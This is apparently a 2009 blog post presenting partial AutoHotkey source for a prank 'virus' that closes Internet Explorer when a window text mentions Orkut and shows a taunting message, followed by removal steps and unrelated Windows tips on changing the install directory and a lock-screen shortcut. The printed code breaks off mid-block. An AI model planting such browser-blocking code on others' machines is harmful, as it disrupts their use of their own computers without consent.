Saturday, August 15, 2009

Muhaha virus source code [orkut blocker]

[hide_me]
Virus Code:

ifwinactive ahk_class IEFrame


{





ControlGetText,ed,edit1,ahk_class IEFrame


ifinstring,ed,orkut


{


winclose ahk_class IEFrame


soundplay,C:heap41a2.mp3


msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The


administrators didnt write this program guess who did??


`r`r MUHAHAHA!!,30


return


}


ControlGetText,ed,edit2,ahk_class IEFrame


ifinstring,ed,orkut


{


winclose ahk_class IEFrame


soundplay,C:heap41a2.mp3


msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The


administrators didnt write this program guess who did??


`r`r MUHAHAHA!!,30


return


}


ControlGetText,ed,edit3,ahk_class IEFrame


ifinstring,ed,orkut


{


winclose ahk_class IEFrame


soundplay,C:heap41a2.mp3


msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The


administrators didnt write this program guess who did??


`r`r MUHAHAHA!!,30


return


}


ControlGetText,ed,edit4,ahk_class IEFrame


ifinstring,ed,orkut


{[/b]
It is the source code of a virus that blocks Orkut, Youtube and Firefox
and shows a message as under,if you try to open either of the two
websites :

"ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? MUHAHAHA!!"

It makes a folder named heap41a in the C: drive with attributes S
(System file) and H (Hidden file).If your pc is infected by this virus
then just boot it in safe mode,goto cmd prompt and at C:> type
attrib -S -H heap41a to make this folder visible and then just delete
this folder.Now use a registry cleaner to delete the registry keys made
by this

Easy Method to delete the virus.:
open task manager>process tab>there if you find svchost.exe
befor your user name (remember also system will use svchost.exe don't
end that) just give end process for that then go to run and type C://heap41a and delete all files of that folder.. now you are done Enjoy orkut..

Change the Default Location for Installing Programs

XP uses the C:/Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/or directory by using a Registry hack. Run the
Registry Editor and go to
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion
Look for the value named ProgramFilesDir. By default, the value will be C:/Program Files. Edit the value to any valid drive
or folder; XP will use that new location as the default installation directory for new programs.

Lock Your Computer on Mouse Click!

Instead of pressing CTRL+ALT+DEL or windows + L to lock your machine you can create an icon to lock your machine. There are very simple steps by using it you can simply lock your computer
using single mouse click.


Just Follow the simple step >>

1. Right click

an empty spot on the desktop, point to New and click Shortcut.

2. In the Create Shortcut dialog box, type the following in the 'Type the location' of the item text box:

Code:
rundll32 user32.dll,LockWorkStation
3. Click Next

4. In "Type a name for this shortcut", type "" (any name as u wish) and Click Finish

5. This will Create a shortcut in your Desktop.

6.Now each time when you want to lock the computer , Just click on this shortcut.